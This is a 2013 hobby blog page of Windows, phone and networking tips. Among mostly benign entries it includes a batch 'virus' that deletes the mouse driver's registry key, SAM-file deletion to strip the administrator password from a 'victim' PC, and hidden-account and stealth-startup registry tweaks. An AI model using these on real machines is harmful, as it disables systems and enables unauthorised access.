Editor Picks

Welcome to ABHIJEET VISHEN's Blogger Register YourSelf For Ethical Hacking Classes To Be an Expert & Win Prizes"    Register Your Self to Learn Ethical Hacking,Hardware & Networking,HTML,DOT NET,PHP

Monday 24 June 2013

Online Calculator

Documento sin título

Thursday 13 June 2013

Watch Star Wars movie in command prompt


1. Go to start > Run and type in cmd and press enter
2. Now type in telnet as shown below and press enter.
3. After that enter o as shown below and press enter. 
4. Next enter towel.blinkenlights.nl as shown below and press enter.
 5. Now star wars movie will start playing on your command prompt 
 6. Enjoy !! 

Dancing Keyboard Led Light


1. Open Notepad and copy below codes into it.
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
    2. Then save this file as dance.vbs (name can be anything but .vbs is must)
    3. Open your save file and see your keyboard led blinking like disco lights
Making Personal Diary Using Notepad

    1. Open Notepad and Type .LOG (in capital Letters and press enter

    2. Save the program with any name and close it.

    3. Open the file again. Now you can see current date and time, This will happen every time you      reopen notepad.
 

Virus Programme For Disable Mouse




1-Open Note Pad File

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"

reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------- 






2-Save File as a abhijeet.bat

3-Done you just create a virus.

Tuesday 11 June 2013



Mobile To Mobile Balance Transfer


Transfer Balance from Aircel, Airtel, Idea , BSNL ,Vodafone, Docomo


Aircel Balance Transfer Trick-2012

aircel users can transfer balance upto rs 100 transfer code
*122*666#
it wll be working always 
enjoy guys :) 
Airtel Balance Transfer Trick-2012
Step1: SMS GIFT amount friend number [eg: GIFT 50 9908080323] 
Step2: You will recieve a message saying you have that your amount has been transferred to 9908XXXXXX
Minimum Balance Rs.1/- 
Terms and Conditions apply for transferring balance. This trick works only in some states please try this trick with low balance first and go for bigger amount.
 

Tata Docomo Balance Transfer Trick-2012
Step1: SMS “BT  Mobile Number Amount” and send it to 54321
[eg: BT 72078XXXXX 50]
Step2: To reverse the Amount a Member needs to type “ RBT Transaction ID” and send it to54321
Charges  Rs.1 and for reversal will be Toll Free.
Terms and Conditions:
The sender’s account balance for “Balance Transfer” has to be Transfer Amount + Rs.1 at the time of transfer. If balance is not sufficient the transfer will be declined. However, the SMS will be charged.
In case of Reversals the amount reversed will be dependent on the balance available with the recipient.
The system will recognize “BT” or “bt” or “Bt

Idea Free Balance Transfer Trick-2012
Follow the below Steps:
Step1:  Dial *567*friend mobile number*amount#
[eg:*567*9092 XXXXXX*50#]
Bsnl Free Balance Transfer Trick-2012
Follow the steps below:
Step1: SMS ” GIFT friend Bsnl number amount ” to 53733 or 53738
[eg: GIFT 949XXXXXXX 50 ]
Vodafone Free Balance Transfer Trick-2012
Step1: Dial *131*Amount*friend vodafone mobile no#
[eg: *131*50*9052XXXXXX#]



Create A Hidden User Account



This tweak allows an account that is normally displayed on the Welcome screen to be hidden from view. To log on using the account it's necessary to use the Log On To Windows dialog box similar to the one in Windows 2000. #[Start] [Run] [Regedit]#Registry Key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList#Modify/Create the Value Data Type(s) and Value Name(s) as detailed below.#Data Type: REG_DWORD [Dword Value] // Value Name: Type Name of Account to be Hidden#Setting for Value Data: [0 = Account is Hidden / 1 = Enabled]#Exit Registry and Reboot...

While the account is hidden on the Welcome screen, note that the account profile will be visible in C:\Documents and Settings or wherever user profiles are stored as well as in Local Users and Groups

Monday 10 June 2013


Error Reporting in XP


If error reporting in XP is bugging you then turn it off.

When a system error occurs in XP, a little dialog box appears asking if you want to report the error to Microsoft. Click the message box to make it disappear. You don't have to report the error if you don't want to and on today's "Call for Help" Leo shows you how to turn off the feature if you find it distracting.

To disable error reporting, follow these directions:

1. Right-click My Computer and choose Properties.
2. Click the Advanced tab on your System Properties dialog box.
3. Click the Error Reporting button on the Advanced tab.
4. Place a checkmark next to "Disable error reporting."
5. Leave the other radio button unchecked next to the text labeled, "But notify me when critical errors occur."
6. Click OK.
Programs who Hide Microsoft in Windows XP

1. Private Character Editor :

Used for editing fonts,etc.
** start>>Run
** Now, type eudcedit

2. Dr. Watson :

This an inbuilt windows repairing software !
** start>>Run
** Now, type drwtsn32

3. Media Player 5.1 :

Even if you upgrade your Media Player, you can still access your old player in case the new one fails !!!
** start>>Run
** Now, type mplay32

4. iExpress :

Used to create SetupsYou can create your own installers !
** start>>Run
** Now, type iexpress
Nokia Cell Phone Secret Codes




Codes :

1) *#06# For checking IMEI(international Mobile Equipment Identity)
2) *#7780# Reset to factory settings
3) *#0000# To view software version
4) *#2820# Bluetooth device address
5) *#746025625# Sim clock allowed status
6) #pw+1234567890+1# Shows if ur sim as any restrictions

How to "Delete administrator Password" without any software


Method 1
Boot up with DOS and delete the sam.exe and sam.log files from Windows\system32\config in your hard drive. Now when you boot up in NT the password on your built-in administrator account which will be blank (i.e No password). This solution works only if your hard drive is FAT kind.

Method 2

Step 
1. Put your hard disk of your computer in any other pc .Step 2. Boot that computer and use your hard disk as a secondary hard disk (D'nt boot as primary hard disk ).Step 3. Then open that drive in which the victim’s window(or your window) is installed.Step 4. Go to location windows->system32->configStep 5. And delete SAM.exe and SAM.log 
Step 6. Now remove hard disk and put in your computer.
Step 7. And boot your computer -

All (Ctrl+Alt+Del) Permanently deleted files Recovery solution

Sometimes we delete the files permanently, and realize that deleting them is like a Blunder...For all those folks,Here is the solution

Software called "Kissass Undelete" , can bring those files from the hard disk or your flash drive.
Conditions : Only if the data on that drive is not re-occupied(or written). that means the space which was available after the deletion is not been occupied after the deletion.

Click Here to download the .

1)To start searching for the files,
Select the drive from the Left panel of the Windows and Click the scan button.
the Scan might take upto 10 secs.

2)When the files search has been completed, it will show you the results with the name, typ, size and the last modified date of the searched file.

3) Now you can select the file to be recover. This is an Open source application and available for All Windows OS(Windows XP/Vista/ 7).


How do a quick back up for SQL Server 2005


Here is the syntax to quickly backup a database in SQL Server 2005.
Backup database [database name] to disk=’path where you want the file.bak’
Eg:-

backup database CRM_MSCRM to disk=’c:\crmbackup_rakesh.bak’
You can make the backup command to a completely different level but this is a quick tip on just getting a backup to perform some quick maintenance.

Run Programs at Startup without using Startup folder


This tweak allows a program to be launched when the user logs onto the computer. It can be set to run minimized and there is no trace of the executable in the Startup folder on the Start Menu nor in the Documents and Settings folder accessible via Windows Explorer. 
1. Click Start, click Run, and type regedit to run Registry Editor. Navigate to-   

HKEY_CURRENT_USER\Software\Microsoft \Windows\CurrentVersion\Run

2. Modify/Create the Value Data Type(s) and Value Name(s) as given below:
Data Type: REG_SZ [String Value]
Value Name: [Enter the Name of Program Executable]
Value Data: [Enter the Path to the Program Executable]
3. Exit Registry and Reboot.
  1. Windows 7 & Windows 8 Problem Steps Recorder
    1.Open Problem Steps Recorder by clicking the Start button Picture of the Start button, and then typing psr. In the list of results, click psr.
  2. Click Start Record. On your computer, go through the steps on your computer to reproduce the problem. You can pause the recording at any time, and then resume it later.
  3. Click Stop Record.
  4. In the Save As dialog box, type a name for the file, and then click Save (the file is saved with the .zip file name extension).
    To view the record of the steps you recorded, open the .zip file you just saved, and then double-click the file. The document will open in your browser.


NETWORKING FULL FORMS

ACPIadvanced configuration and power interface
ACTactivity
ADSLasymmetrical digital subscriber line
AGPaccelerated graphics port
AMDadvanced micro devices
AMRaudio modem riser
APIPAautomatic private internet protocol addressing
APMadvanced power management
ARPaddress resolution protocol
ASRautomated system recovery
ATadvanced technology
ATAadvanced technology attachment
ATAPIadvanced technology attachment packet interface
ATMasynchronous transfer mode
ATXadvanced technology extended
BIOSbasic input/output system
BNCBayonet-Neill-Concelman or British Navel Connector
BRIbasic rate interface
BTXbalanced technology extended
CCDcharged coupled device
CDcompact disc
CD-ROMcompact disc-read-only memory
CD-RWcompact disc-rewritable
CDFScompact disc file system
CMOScomplementary metal-oxide semiconductor
CNRcommunication network riser
COM1communication port 1
CPUcentral processing unit
CRIMMcontinuity-rambus inline memory module
CRTcathode-ray tube
DACdiscretionary access control
DB-25serial communications D-shell connector, 25 pins
DB-99 pin D shell connector
DCdirect current
DDOSdistributed denial of service
DDRdouble data-rate
DDR RAMdouble data-rate random access memory
DDR SDRAMdouble data-rate synchronous dynamic random access memory
DFSdistributed file system
DHCPdynamic host configuration protocol
DIMMdual inline memory module
DINDeutsche Industrie Norm
DIPdual inline package
DLTdigital linear tape
DLPdigital light processing
DMAdirect memory access
DNSdomain name service or domain name server
DOSdisk operating system or denial of service
DPMSdisplay power management signaling
DRAMdynamic random access memory
DSLdigital subscriber line
DVDdigital video disc or digital versatile disc
DVD-RAMdigital video disc-random access memory
DVD-ROMdigital video disc-read only memory
DVD-Rdigital video disc-recordable
DVD-RWdigital video disc-rewritable
DVIdigital visual interface
ECCerror correction code
ECPextended capabilities port
EEPROMelectrically erasable programmable read-only memory
EFSencrypting file system
EIDEenhanced integrated drive electronics
EISAextended industry standard architecture
EMIelectromagnetic interference
EMPelectromagnetic pulse
EPROMerasable programmable read-only memory
EPPenhanced parallel port
ERDemergency repair disk
ESDelectrostatic discharge
ESDIenhanced small device interface
EVGAextended video graphics adapter/array
EVDOevolution data optimized or evolution data only
FATfile allocation table
FAT1212-bit file allocation table
FAT1616-bit file allocation table
FAT3232-bit file allocation table
FDDfloppy disk drive
FERPAFamily Educational Rights and Privacy Act
FnFunction (referring to the function key on a laptop)
FPMfast page-mode
FRUfield replaceable unit
FTP file transfer protocol
FQDNfully qualified domain name
GBgigabyte
GDIgraphics device interface
GHzgigahertz
GUIgraphical user interface
GPRSgeneral packet radio system
GSMglobal system for mobile communications
HALhardware abstraction layer
HCLhardware compatibility list
HDDhard disk drive
HDMihigh definition media interface
HPFShigh performance file system
HTMLhypertext markup language
HTTPhypertext transfer protocol
HTTPShypertext transfer protocol over secure sockets layer
I/Oinput/output
ICMPinternet control message protocol
ICSinternet connection sharing
ICRintelligent character recognition
IDEintegrated drive electronics
IEEEInstitute of Electrical and Electronics Engineers
IISInternet Information Services
IMAPinternet mail access protocol
IPinternet protocol
IPCONFIGinternet protocol configuration
IPPinternet printing protocol
IPSECinternet protocol security
IPXinternetwork packet exchange
IPX/SPXinternetwork packet exchange/sequenced packet exchange
IRinfrared
IrDAInfrared Data Association
IRQinterrupt request
ISAindustry standard architecture
ISDNintegrated services digital network
ISOIndustry Standards Organization
ISPinternet service provider
KBkilobyte
LANlocal area network
LBAlogical block addressing
LCLucent connector
LCDliquid crystal display
LDAPlightweight directory access protocol
LEDlight emitting diode
LIPor LiPoly lithium-ion polymer
Li-onlithium-ion
LPD/LPRline printer daemon / line printer remote
LPTline printer terminal
LPT1line printer terminal 1
LPXlow profile extended
LVDlow voltage differential
MACmedia access control
MANmetropolitan area network
MAPImessaging application programming interface
Mbmegabit
MBmegabyte
MBRmaster boot record
MBSAMicrosoft Baseline Security Analyzer
MCRmultivariant curve resolution
MFDmulti-function device
MFPmulti-function product
MHzmegahertz
MicroDIMMmicro dual inline memory module
MIDImusical instrument digital interface
MIMEmultipurpose internet mail extension
MLImultiple link interface
MMCMicrosoft management console
MMXmultimedia extensions
MP3Moving Picture Experts Group Layer 3 Audio
MPEGMoving Picture Experts Group
MSCONFIGMicrosoft configuration
MSDSmaterial safety data sheet
MUImultilingual user interface
NASnetwork-attached storage
NATnetwork address translation
NetBIOSnetworked basic input/output system
NetBEUInetworked basic input/output system extended user interface
NFSnetwork file system
NICnetwork interface card
NiCdnickel cadmium
NiMHnickel metal hydride
NLInot logged in or natural language interface
NLXnew low-profile extended
NNTPnetwork news transfer protocol
NTFSnew technology file system
NTLDRnew technology loader
NWLINKNetware Link
OCRoptical character recognition
OEMoriginal equipment manufacturer
OMRoptical mark recognition
OSoperating system
OSRoriginal equipment manufacturer service release
PANpersonal area network
PATAparallel advanced technology attachment
PCpersonal computer
PCIperipheral component interconnect
PCIeperipheral component interconnect express
PCIXperipheral component interconnect extended
PCLprinter control language
PCMCIAPersonal Computer Memory Card International Association
PDApersonal digital assistant
PGApin grid array
PGA2pin grid array 2
PINpersonal identification number
PKIpublic key infrastructure
PnPplug and play
POPpost office protocol
POP3post office protocol 3
POSTpower-on self test
POTSplain old telephone service
PPPpoint-to-point protocol
PPTPpoint-to-point tunneling protocol
PRIprimary rate interface
PROMprogrammable read-only memory
PS/2Personal System/2 connector
PSTNpublic switched telephone network
PVCpermanent virtual circuit
PXEpreboot execution environment
QoSquality of service
RAIDredundant array of independent (or inexpensive) discs
RAMrandom access memory
RASremote access service
RBACrole-based access control or rule-based access control
RDRAMRAMBUS dynamic random access memory
RFradio frequency
RFIradio frequency interference
RGBred green blue
RIMMRAMBUS inline memory module
RIProuting information protocol
RISremote installation service
RISCreduced instruction set computer
RJregistered jack
RJ-11registered jack function 11
RJ-45registered jack function 45
RMAreturned materials authorization
ROMread only memory
RS-232 or RS-232Crecommended standard 232
RTCreal-time clock
SANstorage area network
SATAserial advanced technology attachment
SCsubscription channel
SCSIsmall computer system interface
SCSI IDsmall computer system interface identifier
SDcard secure digital card
SDRAMsynchronous dynamic random access memory
SECsingle edge connector
SFCsystem file checker
SGRAMsynchronous graphics random access memory
SIMMsingle inline memory module
SLIscalable link interface or system level integration or scanline interleave mode
SMBserver message block or small to midsize business
SMTPsimple mail transport protocol
SNMPsimple network management protocol
SoDIMMsmall outline dual inline memory module
SOHOsmall office/home office
SPservice pack
SP1service pack 1
SP2service pack 2
SPDIFSony-Philips digital interface format
SPGAstaggered pin grid array
SPXsequenced package exchange
SRAMstatic random access memory
SSHsecure shell
SSIDservice set identifier
SSLsecure sockets layer
STstraight tip
STPshielded twisted pair
SVGAsuper video graphics array
SXGAsuper extended graphics array
TBterabyte
TCPtransmission control protocol
TCP/IPtransmission control protocol/internet protocol
TDRtime domain reflectometer
TFTPtrivial file transfer protocol
UARTuniversal asynchronous receiver transmitter
UDFuser defined functions or universal disk format or universal data format
UDMAultra direct memory access
UDPuser datagram protocol
ULUnderwriter’s Laboratory
UNCuniversal naming convention
UPSuninterruptible power supply
URLuniform resource locator
USBuniversal serial bus
USMTuser state migration tool
UTPunshielded twisted pair
UXGAultra extended graphics array
VESAVideo Electronics Standards Association
VFATvirtual file allocation table
VGAvideo graphics array
VoIPvoice over internet protocol
VPNvirtual private network
VRAMvideo random access memory
WANwide area network
WAPwireless application protocol
WEPwired equivalent privacy
WIFIwireless fidelity
WINSwindows internet name service
WLANwireless local area network
WPAwireless protected access
WUXGAwide ultra extended graphics array
XGAextended graphics array
ZIFzero-insertion-force
ZIPzigzag inline package

Hub, Switch, and Router Defined

The functions of the three devices are all quite different from one another, even if at times they are all integrated into a single device. Which one do you use when? Let's take a look...

Hub

A common connection point for devices in a network. Hubs are commonly used to connect segments of a LAN. A hub contains multiple ports. When a packet arrives at one port, it is copied to the other ports so that all segments of the LAN can see all packets.

Switch

In networks, a device that filters and forwards packets between LAN segments. Switches operate at the data link layer (layer 2) and sometimes the network layer (layer 3) of the OSI Reference Model and therefore support any packet protocol. LANs that use switches to join segments are called switched LANs or, in the case of Ethernet networks, switched Ethernet LANs.

Router

A device that forwards data packets along networks. A router is connected to at least two networks, commonly two LANs or WANs or a LAN and its ISP.s network. Routers are located at gateways, the places where two or more networks connect. Routers use headers and forwarding tables to determine the best path for forwarding the packets, and they use protocols such as ICMP to communicate with each other and configure the best route between any two hosts.

The Differences Between Hubs, Switches, and Routers on the Network

Today most routers have become something of a Swiss Army knife, combining the features and functionality of a router and switch/hub into a single unit. So conversations regarding these devices can be a bit misleading — especially to someone new to computer networking.
The functions of a router, hub and a switch are all quite different from one another, even if at times they are all integrated into a single device. Let's start with the hub and the switch since these two devices have similar roles on the network.
Each serves as a central connection for all of your network equipment and handles a data type known as frames. Frames carry your data. When a frame is received, it is amplified and then transmitted on to the port of the destination PC. The big difference between these two devices is in the method in which frames are being delivered.

In a hub, a frame is passed along or "broadcast" to every one of its ports. It doesn't matter that the frame is only destined for one port. The hub has no way of distinguishing which port a frame should be sent to. Passing it along to every port ensures that it will reach its intended destination. This places a lot of traffic on the network and can lead to poor network response times.

Additionally, a 10/100Mbps hub must share its bandwidth with each and every one of its ports. So when only one PC is broadcasting, it will have access to the maximum available bandwidth. If, however, multiple PCs are broadcasting, then that bandwidth will need to be divided among all of those systems, which will degrade performance.

A switch, however, keeps a record of the MAC addresses of all the devices connected to it. With this information, a switch can identify which system is sitting on which port. So when a frame is received, it knows exactly which port to send it to, without significantly increasing network response times. And, unlike a hub, a 10/100Mbps switch will allocate a full 10/100Mbps to each of its ports. So regardless of the number of PCs transmitting, users will always have access to the maximum amount of bandwidth. It's for these reasons why a switch is considered to be a much better choice then a hub.

Routers are completely different devices. Where a hub or switch is concerned with transmitting frames, a router's job, as its name implies, is to route packets to other networks until that packet ultimately reaches its destination. One of the key features of a packet is that it not only contains data, but the destination address of where it's going.

A router is typically connected to at least two networks, commonly two Local Area Networks (LANs) or Wide Area Networks (WAN) or a LAN and its ISP's network . for example, your PC or workgroup and EarthLink. Routers are located at gateways, the places where two or more networks connect. Using headers and forwarding tables, routers determine the best path for forwarding the packets. Router use protocols such as ICMP to communicate with each other and configure the best route between any two hosts.

Today, a wide variety of services are integrated into most broadband routers. A router will typically include a 4 - 8 port Ethernet switch (or hub) and a Network Address Translator (NAT). In addition, they usually include a Dynamic Host Configuration Protocol (DHCP) server, Domain Name Service (DNS) proxy server and a hardware firewall to protect the LAN from malicious intrusion from the Internet.

All routers have a WAN Port that connects to a DSL or cable modem for broadband Internet service and the integrated switch allows users to easily create a LAN. This allows all the PCs on the LAN to have access to the Internet and Windows file and printer sharing services.

Routers might have a single WAN port and a single LAN port and are designed to connect an existing LAN hub or switch to a WAN. Ethernet switches and hubs can be connected to a router with multiple PC ports to expand a LAN. Depending on the capabilities (kinds of available ports) of the router and the switches or hubs, the connection between the router and switches/hubs may require either straight-thru or crossover (null-modem) cables. Some routers even have USB ports, and more commonly, wireless access points built into them.

Some of the more high-end or business class routers will also incorporate a serial port that can be connected to an external dial-up modem, which is useful as a backup in the event that the primary broadband connection goes down, as well as a built in LAN printer server and printer port.

Besides the inherent protection features provided by the NAT, many routers will also have a built-in, configurable, hardware-based firewall. Firewall capabilities can range from the very basic to quite sophisticated devices. Among the capabilities found on leading routers are those that permit configuring TCP/UDP ports for games, chat services, and the like, on the LAN behind the firewall.

So, in short, a hub glues together an Ethernet network segment, a switch can connect multiple Ethernet segments more efficiently and a router can do those functions plus route TCP/IP packets between multiple LANs and/or WANs; and much more of course.

Funny Shotting Videos 


Picture



click here-

http://www.youtube.com/watch?feature=player_embedded&v=-EVqT3XEzss


Windows IP Utilities



1. PING
PING is a simple application (command) used to determine whether a host is online and available. PING command sends one or more ICMP Echo messages to a specified host requesting a reply. The receiver (Target Host) responds to this ICMP Echo message and returns it back to the sender. This confirms that the Host is online and available. Otherwise the host is said to be unavailable.
Syntax:
C:\>ping gohacking.com
 
2. TELNET
Telnet command is used to connect to a desired host on a specified port number. For example
Syntax:
C:\>telnet yahoo.com 25
C:\>telnet yahoo.com
 
NOTE: The default port number is 23. When the port number is not specified the default number is assumed.
 
Telnet Hacking is explained in detail in the following post.
How To Send Fake Email
 
3. NSLOOKUP
Many times we think about finding out the IP address of a given site. Say for example google.com, yahoo.com, microsoft.com etc. But how to do this? For this there are some websites that can be used to find out the IP address of a given site. But in Windows we have an inbuilt tool to do this job for us. It is nslookup. Yes this tool can be used for resolving a given domain name into it’s IP address (determine the IP of a given site name). Not only this it can also be used for reverse IP lookup. That is if the IP address is given it determines the corresponding domain name for that IP address.
Syntax:
C:\>nslookup google.com
 
4. NETSTAT
The netstat command can be used to display the current TCP/IP network connections. For example the following netstat command displays all connections and their corresponding listening port numbers.
Eg: C:\>netstat -a
 
This command can be used to determine the IP address/Host names of all the applications connected to your computer. If a hacker is connected to your system even the hacker’s IP is displayed. So the netstat command can be used to get an idea of all the active connections to a given system.


How to Change the ICON of an EXE file






I’ll give you a step-by-step instruction on how to use this tool to change the icon.

1. Goto www.shelllabs.com and download the trial version of Icon Changer and install it (Works on both XP and Vista).

2. Right-click on the exe file whose ICON is to be changed.

3. Now you will see the option Change Icon. Click on that option.

4. Now the Icon Changer program will open up.

5. Icon changer will search for all the ICONS on your system so that you can select any one of those.

6. Now select the ICON of your choice and click on SET.

7. Now a popup window will appear and ask you to select from either of these two options.
  • Change embeded icon.
  • Adjust Windows to display custom icon.
Select the first option (Change embeded icon).

8. You are done. The ICON get’s changed.